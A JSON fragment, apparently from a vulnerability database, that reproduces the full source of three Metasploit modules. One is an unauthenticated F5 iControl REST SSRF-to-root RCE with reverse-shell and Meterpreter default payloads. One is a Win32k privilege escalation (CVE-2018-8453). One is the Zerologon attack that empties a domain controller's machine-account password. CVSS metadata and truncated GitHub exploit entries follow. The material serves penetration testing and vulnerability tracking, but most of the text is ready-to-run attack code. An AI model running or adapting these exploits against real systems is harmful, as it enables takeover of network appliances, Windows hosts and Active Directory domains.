"2020-09-15T19:55:08", "type": "qualysblog", "title": "Microsoft Netlogon Vulnerability (CVE-2020-1472 \u2013 Zerologon) \u2013 Automatically Discover, Prioritize and Remediate Using Qualys VMDR\u00ae", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-15T19:55:08", "id": "QUALYSBLOG:192411B44569225E2F2632594DC4308C", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2023-06-23T11:09:32", "description": "This module exploits a pre-auth SSRF in the F5 iControl REST API's /mgmt/shared/authn/login endpoint to generate an X-F5-Auth-Token that can be used to execute root commands on an affected BIG-IP or BIG-IQ device. This vulnerability is known as CVE-2021-22986. CVE-2021-22986 affects the following BIG-IP versions: * 12.1.0 - 12.1.5 * 13.1.0 - 13.1.3 * 14.1.0 - 14.1.3 * 15.1.0 - 15.1.2 * 16.0.0 - 16.0.1 And the following BIG-IQ versions: * 6.0.0 - 6.1.0 * 7.0.0 * 7.1.0 Tested against BIG-IP Virtual Edition 16.0.1 in VMware Fusion.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-31T19:02:32", "type": "metasploit", "title": "F5 iControl REST Unauthenticated SSRF Token Generation RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986"], "modified": "2021-06-03T01:32:47", "id": "MSF:EXPLOIT-LINUX-HTTP-F5_ICONTROL_REST_SSRF_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/f5_icontrol_rest_ssrf_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'F5 iControl REST Unauthenticated SSRF Token Generation RCE',\n 'Description' => %q{\n This module exploits a pre-auth SSRF in the F5 iControl REST API's\n /mgmt/shared/authn/login endpoint to generate an X-F5-Auth-Token that\n can be used to execute root commands on an affected BIG-IP or BIG-IQ\n device. This vulnerability is known as CVE-2021-22986.\n\n CVE-2021-22986 affects the following BIG-IP versions:\n\n * 12.1.0 - 12.1.5\n * 13.1.0 - 13.1.3\n * 14.1.0 - 14.1.3\n * 15.1.0 - 15.1.2\n * 16.0.0 - 16.0.1\n\n And the following BIG-IQ versions:\n\n * 6.0.0 - 6.1.0\n * 7.0.0\n * 7.1.0\n\n Tested against BIG-IP Virtual Edition 16.0.1 in VMware Fusion.\n },\n 'Author' => [\n 'wvu', # Analysis and exploit\n 'Rich Warren' # First blood (RCE) and endpoint collaboration\n ],\n 'References' => [\n ['CVE', '2021-22986'],\n ['URL', 'https://support.f5.com/csp/article/K03009991'],\n ['URL', 'https://attackerkb.com/assessments/f6b19d24-b24e-4abd-98cf-2988d7424311'],\n ['URL', 'https://research.nccgroup.com/2021/03/18/rift-detection-capabilities-for-recent-f5-big-ip-big-iq-icontrol-rest-api-vulnerabilities-cve-2021-22986/']\n # https://clouddocs.f5.com/products/big-iq/mgmt-api/v7.0.0/ApiReferences/bigiq_public_api_ref/r_auth_login.html\n ],\n 'DisclosureDate' => '2021-03-10', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_python_ssl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'CMDSTAGER::FLAVOR' => :bourne,\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION], # Only one concurrent session\n 'SideEffects' => [\n IOC_IN_LOGS, # /var/log/restjavad.0.log (rotated)\n ACCOUNT_LOCKOUTS, # Unlikely with bigipAuthCookie\n ARTIFACTS_ON_DISK # CmdStager\n ]\n }\n )\n )\n\n register_options([\n Opt::RPORT(443),\n OptString.new('TARGETURI', [true, 'Base path', '/']),\n OptString.new('USERNAME', [true, 'Valid admin username', 'admin']),\n OptString.new('ENDPOINT', [false, 'Custom token generation endpoint'])\n ])\n\n register_advanced_options([\n OptFloat.new('CmdExecTimeout', [true, 'Command execution timeout', 3.5])\n ])\n end\n\n def username\n datastore['USERNAME']\n end\n\n def user_reference_endpoint\n normalize_uri(target_uri.path, '/mgmt/shared/authz/users', username)\n end\n\n def check\n generate_token_ssrf ? CheckCode::Vulnerable : CheckCode::Safe\n end\n\n def exploit\n return unless (@token ||= generate_token_ssrf)\n\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n end\n\n def generate_token_ssrf\n print_status('Generating token via SSRF...')\n vprint_status(\"Username: #{username}\")\n vprint_status(\"Endpoint: #{login_reference_endpoint}\")\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/mgmt/shared/authn/login'),\n 'ctype' => 'application/json',\n 'data' => {\n 'username' => username,\n 'bigipAuthCookie' => '',\n 'authProviderName' => 'local',\n 'loginReference' => {\n 'link' => \"https://localhost#{login_reference_endpoint}\"\n },\n 'userReference' => {\n 'link' => \"https://localhost#{user_reference_endpoint}\"\n }\n }.to_json\n )\n\n unless res&.code == 200 && (@token = res.get_json_document.dig('token', 'token'))\n print_error('Failed to generate token')\n return\n end\n\n print_good(\"Successfully generated token: #{@token}\")\n @token\n end\n\n def execute_command(cmd, _opts = {})\n bash_cmd = \"eval $(echo #{Rex::Text.encode_base64(cmd)} | base64 -d)\"\n\n print_status(\"Executing command: #{bash_cmd}\")\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/mgmt/tm/util/bash'),\n 'ctype' => 'application/json',\n 'headers' => {\n 'X-F5-Auth-Token' => @token\n },\n 'data' => {\n 'command' => 'run',\n 'utilCmdArgs' => \"-c '#{bash_cmd}'\"\n }.to_json\n }, datastore['CmdExecTimeout'])\n\n unless res\n print_warning('Command execution timed out')\n return\n end\n\n json = res.get_json_document\n\n unless res.code == 200 && json['kind'] == 'tm:util:bash:runstate'\n fail_with(Failure::PayloadFailed, 'Failed to execute command')\n end\n\n print_good('Successfully executed command')\n\n return unless (cmd_result = json['commandResult'])\n\n vprint_line(cmd_result)\n end\n\n def login_reference_endpoint\n if datastore['ENDPOINT']\n return normalize_uri(target_uri.path, datastore['ENDPOINT'])\n end\n\n @token_generation_endpoint ||= token_generation_endpoints.sample\n\n normalize_uri(target_uri.path, @token_generation_endpoint)\n end\n\n # Usable token generation endpoints between versions 12.1.4 and 16.0.1\n def token_generation_endpoints\n %w[\n /access/file-path-manager/indexing\n /cm/autodeploy/cluster-software-images/indexing\n /cm/autodeploy/qkview/indexing\n /cm/autodeploy/software-images/indexing\n /cm/autodeploy/software-volume-install/indexing\n /cm/system/authn/providers/tmos/1f44a60e-11a7-3c51-a49f-82983026b41b/users/indexing\n /cm/system/authn/providers/tmos/indexing\n /mgmt/shared/analytics/avr-proxy-tasks\n /mgmt/shared/gossip\n /mgmt/shared/gossip-peer-refresher\n /mgmt/shared/identified-devices/config/device-refresh\n /mgmt/shared/save-config\n /mgmt/tm/shared/bigip-failover-state\n /shared/analytics/avr-proxy-tasks\n /shared/analytics/avr-proxy-tasks/indexing\n /shared/analytics/event-aggregation-tasks/indexing\n /shared/analytics/event-analysis-tasks/indexing\n /shared/authn/providers/local/groups/indexing\n /shared/authz/remote-resources/indexing\n /shared/authz/resource-groups/indexing\n /shared/authz/roles/indexing\n /shared/authz/tokens/indexing\n /shared/chassis-framework-upgrades/indexing\n /shared/device-discovery-tasks/indexing\n /shared/device-group-key-pairs/indexing\n /shared/echo/indexing\n /shared/framework-info-tasks/indexing\n /shared/framework-upgrades/indexing\n /shared/gossip\n /shared/gossip-peer-refresher\n /shared/group-task/indexing\n /shared/iapp/blocks/indexing\n /shared/iapp/build-package/indexing\n /shared/iapp/health-prefix-map/indexing\n /shared/iapp/package-management-tasks/indexing\n /shared/iapp/template-loader/indexing\n /shared/identified-devices/config/device-refresh\n /shared/nodejs/loader-path-config/indexing\n /shared/package-deployments/indexing\n /shared/resolver/device-groups/indexing\n /shared/resolver/device-groups/tm-shared-all-big-ips/devices/indexing\n /shared/root-framework-upgrades/indexing\n /shared/rpm-tasks/indexing\n /shared/save-config\n /shared/snapshot-task/indexing\n /shared/snapshot/indexing\n /shared/stats-information/indexing\n /shared/storage/tasks/indexing\n /shared/task-scheduler/scheduler/indexing\n /shared/tmsh-shell/indexing\n /tm/analytics/afm-sweeper/generate-report/indexing\n /tm/analytics/afm-sweeper/report-results/indexing\n /tm/analytics/application-security-anomalies/generate-report/indexing\n /tm/analytics/application-security-anomalies/report-results/indexing\n /tm/analytics/application-security-network/generate-report/indexing\n /tm/analytics/application-security-network/report-results/indexing\n /tm/analytics/application-security/generate-report/indexing\n /tm/analytics/application-security/report-results/indexing\n /tm/analytics/asm-bypass/generate-report/indexing\n /tm/analytics/asm-bypass/report-results/indexing\n /tm/analytics/asm-cpu/generate-report/indexing\n /tm/analytics/asm-cpu/report-results/indexing\n /tm/analytics/asm-memory/generate-report/indexing\n /tm/analytics/asm-memory/report-results/indexing\n /tm/analytics/cpu/generate-report/indexing\n /tm/analytics/cpu/report-results/indexing\n /tm/analytics/disk-info/generate-report/indexing\n /tm/analytics/disk-info/report-results/indexing\n /tm/analytics/dns/generate-report/indexing\n /tm/analytics/dns/report-results/indexing\n /tm/analytics/dos-l3/generate-report/indexing\n /tm/analytics/dos-l3/report-results/indexing\n /tm/analytics/http/generate-report/indexing\n /tm/analytics/http/report-results/indexing\n /tm/analytics/ip-intelligence/generate-report/indexing\n /tm/analytics/ip-intelligence/report-results/indexing\n /tm/analytics/ip-layer/generate-report/indexing\n /tm/analytics/ip-layer/report-results/indexing\n /tm/analytics/lsn-pool/generate-report/indexing\n /tm/analytics/lsn-pool/report-results/indexing\n /tm/analytics/memory/generate-report/indexing\n /tm/analytics/memory/report-results/indexing\n /tm/analytics/network/generate-report/indexing\n /tm/analytics/network/report-results/indexing\n /tm/analytics/pem/generate-report/indexing\n /tm/analytics/pem/report-results/indexing\n /tm/analytics/proc-cpu/generate-report/indexing\n /tm/analytics/proc-cpu/report-results/indexing\n /tm/analytics/protocol-security-http/generate-report/indexing\n /tm/analytics/protocol-security-http/report-results/indexing\n /tm/analytics/protocol-security/generate-report/indexing\n /tm/analytics/protocol-security/report-results/indexing\n /tm/analytics/sip/generate-report/indexing\n /tm/analytics/sip/report-results/indexing\n /tm/analytics/swg-blocked/generate-report/indexing\n /tm/analytics/swg-blocked/report-results/indexing\n /tm/analytics/swg/generate-report/indexing\n /tm/analytics/swg/report-results/indexing\n /tm/analytics/tcp-analytics/generate-report/indexing\n /tm/analytics/tcp-analytics/report-results/indexing\n /tm/analytics/tcp/generate-report/indexing\n /tm/analytics/tcp/report-results/indexing\n /tm/analytics/udp/generate-report/indexing\n /tm/analytics/udp/report-results/indexing\n /tm/analytics/vcmp/generate-report/indexing\n /tm/analytics/vcmp/report-results/indexing\n /tm/analytics/virtual/generate-report/indexing\n /tm/analytics/virtual/report-results/indexing\n /tm/shared/bigip-failover-state\n /tm/shared/sys/backup/indexing\n ]\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/f5_icontrol_rest_ssrf_rce.rb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-13T22:03:22", "description": "An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka \"Win32k Elevation of Privilege Vulnerability.\" This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. This module is tested against Windows 10 v1703 x86.\n", "cvss3": {}, "published": "2019-07-09T12:15:13", "type": "metasploit", "title": "Windows NtUserSetWindowFNID Win32k User Callback", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-8453"], "modified": "2023-05-25T04:36:46", "id": "MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2018_8453_WIN32K_PRIV_ESC-", "href": "https://www.rapid7.com/db/modules/exploit/windows/local/cve_2018_8453_win32k_priv_esc/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ManualRanking\n\n include Msf::Post::File\n include Msf::Exploit::EXE\n include Msf::Post::Windows::Priv\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Windows NtUserSetWindowFNID Win32k User Callback',\n 'Description' => %q{\n An elevation of privilege vulnerability exists in Windows when the Win32k component\n fails to properly handle objects in memory, aka \"Win32k Elevation of Privilege Vulnerability.\"\n This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows\n Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2,\n Windows 10, Windows 10 Servers.\n This module is tested against Windows 10 v1703 x86.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'ze0r', # Exploit analysis and PoC\n 'Kaspersky Lab', # Vulnerability discovery/detection\n 'Jacob Robles' # Metasploit module\n ],\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'SessionTypes' => [ 'meterpreter' ],\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread'\n },\n 'Targets' => [\n [\n 'Windows 10 v1703 (Build 15063) x86', {\n 'UniqueProcessIdOffset' => 180,\n 'TokenOffset' => 252,\n 'Version' => Msf::WindowsVersion::Win10_1703\n }\n ]\n ],\n 'References' => [\n ['CVE', '2018-8453'],\n ['URL', 'https://github.com/ze0r/cve-2018-8453-exp'],\n ['URL', 'https://mp.weixin.qq.com/s/ogKCo-Jp8vc7otXyu6fTig'],\n ['URL', 'https://mp.weixin.qq.com/s/dcbUeegM0BqErtDufOXfoQ'],\n ['URL', 'https://securelist.com/cve-2018-8453-used-in-targeted-attacks/88151/'],\n ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8453']\n ],\n 'Notes' => {\n 'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS],\n 'Stability' => [CRASH_OS_RESTARTS]\n },\n 'DisclosureDate' => '2018-10-09',\n 'DefaultTarget' => 0,\n 'Compat' => {\n 'Meterpreter' => {\n 'Commands' => %w[\n stdapi_sys_config_getenv\n stdapi_sys_process_execute\n ]\n }\n }\n )\n )\n end\n\n def target_info\n fail_with(Failure::None, 'Session is already elevated') if is_system?\n\n version = get_version_info\n unless version.build_number == target['Version'] && sysinfo['Architecture'] == 'x86'\n fail_with(Failure::NoTarget, 'Target is not compatible with exploit')\n end\n end\n\n def write_file_to_target(fname, data)\n tempdir = session.sys.config.getenv('TEMP')\n file_loc = \"#{tempdir}\\\\#{fname}\"\n vprint_warning(\"Attempting to write #{fname} to #{tempdir}\")\n write_file(file_loc, data)\n vprint_good(\"#{fname} written\")\n file_loc\n rescue Rex::Post::Meterpreter::RequestError => e\n elog('Unable to write file to target', error: e)\n fail_with(Failure::Unknown, \"Writing #{fname} to disk was unsuccessful\")\n end\n\n def exploit\n target_info\n exe_name = 'CVE-2018-8453.exe'\n exe_path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8453', exe_name)\n vprint_status(\"Reading payload from file #{exe_path}\")\n raw = File.read(exe_path)\n\n tmp_exe = \"#{Rex::Text.rand_text_alphanumeric(10)}.exe\"\n vprint_status(\"Uploading exploit exe as: #{tmp_exe}\")\n exe_rpath = write_file_to_target(tmp_exe, raw)\n register_file_for_cleanup(exe_rpath)\n\n tmp_payload = \"#{Rex::Text.rand_text_alpha(6..14)}.exe\"\n payload_rpath = write_file_to_target(tmp_payload, generate_payload_exe)\n vprint_status(\"Uploading payload #{tmp_payload}\")\n register_file_for_cleanup(payload_rpath)\n\n command = \"\\\"#{exe_rpath}\\\" \\\"#{payload_rpath}\\\" #{target['UniqueProcessIdOffset']} #{target['TokenOffset']}\"\n\n vprint_status(\"Executing command: #{command}\")\n session.sys.process.execute(command, nil, { 'Hidden' => false })\n print_good('Exploit finished, wait for privileged payload execution to complete.')\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/cve_2018_8453_win32k_priv_esc.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-24T02:32:25", "description": "A vulnerability exists within the Netlogon authentication process where the security properties granted by AES are lost due to an implementation flaw related to the use of a static initialization vector (IV). An attacker can leverage this flaw to target an Active Directory Domain Controller and make repeated authentication attempts using NULL data fields which will succeed every 1 in 256 tries (~0.4%). This module leverages the vulnerability to reset the machine account password to an empty string, which will then allow the attacker to authenticate as the machine account. After exploitation, it's important to restore this password to it's original value. Failure to do so can result in service instability.\n", "cvss3": {}, "published": "2020-09-17T18:28:53", "type": "metasploit", "title": "Netlogon Weak Cryptographic Authentication", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2022-08-03T14:32:38", "id": "MSF:AUXILIARY-ADMIN-DCERPC-CVE_2020_1472_ZEROLOGON-", "href": "https://www.rapid7.com/db/modules/auxiliary/admin/dcerpc/cve_2020_1472_zerologon/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'windows_error'\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::DCERPC\n include Msf::Exploit::Remote::SMB::Client\n include Msf::Auxiliary::Report\n\n CheckCode = Exploit::CheckCode\n Netlogon = RubySMB::Dcerpc::Netlogon\n EMPTY_SHARED_SECRET = OpenSSL::Digest.digest('MD4', '')\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Netlogon Weak Cryptographic Authentication',\n 'Description' => %q{\n A vulnerability exists within the Netlogon authentication process where the security properties granted by AES\n are lost due to an implementation flaw related to the use of a static initialization vector (IV). An attacker\n can leverage this flaw to target an Active Directory Domain Controller and make repeated authentication attempts\n using NULL data fields which will succeed every 1 in 256 tries (~0.4%). This module leverages the vulnerability\n to reset the machine account password to an empty string, which will then allow the attacker to authenticate as\n the machine account. After exploitation, it's important to restore this password to it's original value. Failure\n to do so can result in service instability.\n },\n 'Author' => [\n 'Tom Tervoort', # original vulnerability details\n 'Spencer McIntyre', # metasploit module\n 'Dirk-jan Mollema' # password restoration technique\n ],\n 'Notes' => {\n 'AKA' => ['Zerologon'],\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [],\n 'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]\n },\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'REMOVE', { 'Description' => 'Remove the machine account password' } ],\n [ 'RESTORE', { 'Description' => 'Restore the machine account password' } ]\n ],\n 'DefaultAction' => 'REMOVE',\n 'References' => [\n [ 'CVE', '2020-1472' ],\n [ 'URL', 'https://www.secura.com/blog/zero-logon' ],\n [ 'URL', 'https://github.com/SecuraBV/CVE-2020-1472/blob/master/zerologon_tester.py' ],\n [ 'URL', 'https://github.com/dirkjanm/CVE-2020-1472/blob/master/restorepassword.py' ]\n ]\n )\n )\n\n register_options(\n [\n OptPort.new('RPORT', [ false, 'The netlogon RPC port' ]),\n OptString.new('NBNAME', [ true, 'The server\\'s NetBIOS name' ]),\n OptString.new('PASSWORD', [ false, 'The password to restore for the machine account (in hex)' ], conditions: %w[ACTION == RESTORE]),\n ]\n )\n end\n\n def peer\n \"#{rhost}:#{@dport || datastore['RPORT']}\"\n end\n\n def bind_to_netlogon_service\n @dport = datastore['RPORT']\n if @dport.nil? || @dport == 0\n @dport = dcerpc_endpoint_find_tcp(datastore['RHOST'], Netlogon::UUID, '1.0', 'ncacn_ip_tcp')\n fail_with(Failure::NotFound, 'Could not determine the RPC port used by the Microsoft Netlogon Server') unless @dport\n end\n\n # Bind to the service\n handle = dcerpc_handle(Netlogon::UUID, '1.0', 'ncacn_ip_tcp', [@dport])\n print_status(\"Binding to #{handle} ...\")\n dcerpc_bind(handle)\n print_status(\"Bound to #{handle} ...\")\n end\n\n def check\n bind_to_netlogon_service\n\n status = nil\n 2000.times do\n netr_server_req_challenge\n response = netr_server_authenticate3\n\n break if (status = response.error_status) == 0\n\n windows_error = ::WindowsError::NTStatus.find_by_retval(response.error_status.to_i).first\n # Try again if the Failure is STATUS_ACCESS_DENIED, otherwise something has gone wrong\n next if windows_error == ::WindowsError::NTStatus::STATUS_ACCESS_DENIED\n\n fail_with(Failure::UnexpectedReply, windows_error)\n end\n\n return CheckCode::Detected unless status == 0\n\n CheckCode::Vulnerable\n end\n\n def run\n case action.name\n when 'REMOVE'\n action_remove_password\n when 'RESTORE'\n action_restore_password\n end\n end\n\n def action_remove_password\n fail_with(Failure::Unknown, 'Failed to authenticate to the server by leveraging the vulnerability') unless check == CheckCode::Vulnerable\n\n print_good('Successfully authenticated')\n\n report_vuln(\n host: rhost,\n port: @dport,\n name: name,\n sname: 'dcerpc',\n proto: 'tcp',\n refs: references,\n info: \"Module #{fullname} successfully authenticated to the server without knowledge of the shared secret\"\n )\n\n response = netr_server_password_set2\n status = response.error_status.to_i\n fail_with(Failure::UnexpectedReply, \"Password change failed with NT status: 0x#{status.to_s(16)}\") unless status == 0\n\n print_good(\"Successfully set the machine account (#{datastore['NBNAME']}$) password to: aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 (empty)\")\n end\n\n def action_restore_password\n fail_with(Failure::BadConfig, 'The RESTORE action requires the PASSWORD option to be set') if datastore['PASSWORD'].blank?\n fail_with(Failure::BadConfig, 'The PASSWORD option must be in hex') if /^([0-9a-fA-F]{2})+$/ !~ datastore['PASSWORD']\n password = [datastore['PASSWORD']].pack('H*')\n\n bind_to_netlogon_service\n client_challenge = OpenSSL::Random.random_bytes(8)\n\n response = netr_server_req_challenge(client_challenge: client_challenge)\n session_key = Netlogon.calculate_session_key(EMPTY_SHARED_SECRET, client_challenge, response.server_challenge)\n ppp = Netlogon.encrypt_credential(session_key, client_challenge)\n\n response = netr_server_authenticate3(client_credential: ppp)\n fail_with(Failure::NoAccess, 'Failed to authenticate (the machine account password may not be empty)') unless response.error_status == 0\n\n new_password_data = (\"\\x00\" * (512 - password.length)) + password + [password.length].pack('V')\n response = netr_server_password_set2(\n authenticator: Netlogon::NetlogonAuthenticator.new(\n credential: Netlogon.encrypt_credential(session_key, [ppp.unpack1('Q') + 10].pack('Q')),\n timestamp: 10\n ),\n clear_new_password: Netlogon.encrypt_credential(session_key, new_password_data)\n )\n status = response.error_status.to_i\n fail_with(Failure::UnexpectedReply, \"Password change failed with NT status: 0x#{status.to_s(16)}\") unless status == 0\n\n print_good(\"Successfully set machine account (#{datastore['NBNAME']}$) password\")\n end\n\n def netr_server_authenticate3(client_credential: \"\\x00\" * 8)\n nrpc_call('NetrServerAuthenticate3',\n primary_name: \"\\\\\\\\#{datastore['NBNAME']}\",\n account_name: \"#{datastore['NBNAME']}$\",\n secure_channel_type: :ServerSecureChannel,\n computer_name: datastore['NBNAME'],\n client_credential: client_credential,\n flags: 0x212fffff)\n end\n\n def netr_server_password_set2(authenticator: nil, clear_new_password: \"\\x00\" * 516)\n authenticator ||= Netlogon::NetlogonAuthenticator.new(credential: \"\\x00\" * 8, timestamp: 0)\n nrpc_call('NetrServerPasswordSet2',\n primary_name: \"\\\\\\\\#{datastore['NBNAME']}\",\n account_name: \"#{datastore['NBNAME']}$\",\n secure_channel_type: :ServerSecureChannel,\n computer_name: datastore['NBNAME'],\n authenticator: authenticator,\n clear_new_password: clear_new_password)\n end\n\n def netr_server_req_challenge(client_challenge: \"\\x00\" * 8)\n nrpc_call('NetrServerReqChallenge',\n primary_name: \"\\\\\\\\#{datastore['NBNAME']}\",\n computer_name: datastore['NBNAME'],\n client_challenge: client_challenge)\n end\n\n def nrpc_call(name, **kwargs)\n request = Netlogon.const_get(\"#{name}Request\").new(**kwargs)\n\n begin\n raw_response = dcerpc.call(request.opnum, request.to_binary_s)\n rescue Rex::Proto::DCERPC::Exceptions::Fault\n fail_with(Failure::UnexpectedReply, \"The #{name} Netlogon RPC request failed\")\n end\n\n Netlogon.const_get(\"#{name}Response\").read(raw_response)\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/dcerpc/cve_2020_1472_zerologon.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "githubexploit": [{"lastseen": "2022-08-15T21:13:41", "description": "# \u4f7f\u7528\r\n\r\n```\r\npython3 f5_rce.py \r\n\r\n-u \u6307\u5b9a\u76ee\u6807URL\r\n-f \u6279\u91cf\u68c0\u6d4b\u6587\u4ef6\r\n-c \u6267\u884c\u547d...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-19T18:50:22", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986"], "modified": "2022-08-15T15:41:27", "id": "4E7397B3-57E1-5961-BE00-E340DD46B130", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-21T12:47:54", "description": "## Vuln Impact\r\n\r\nThis vulnerability allows for unauthenticated ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-22T07:13:50", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986"], "modified": "2022-07-21T02:11:00", "id": "B96958C0-96FF-52FF-A4B1-CE6F774F0C6F", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": 